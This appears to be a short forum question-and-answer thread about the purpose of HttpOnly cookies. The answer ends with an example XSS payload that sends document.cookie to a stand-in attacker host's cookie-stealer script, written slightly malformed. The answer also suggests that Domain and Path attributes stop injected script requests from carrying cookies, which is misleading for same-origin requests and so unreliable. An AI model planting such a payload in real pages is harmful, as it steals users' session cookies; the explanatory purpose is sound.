From what I understand, HttpOnly cookies cannot be read by client js but they are passed by the browser with any subsequent requests.
If an attacker is able to inject js in to a web page and makes a request to the endpoint, it would still go through because all cookies are passed along, correct?
What's the point of HttpOnly cookies?
If an attacker is able to inject js in to a web page and makes a request to the endpoint, it would still go through because all cookies are passed along, correct?
No. The Domain and Path attributes define the scope of the cookie: what URLs the cookies should be sent to.
Chek the section "Define where cookies are sent" here.
But without HttpOnly an attacker is able to access cookie value with js:
<script> document.location=”http://Attacker’sIP/cookiestealer.php?c=”document.cookie; </script>
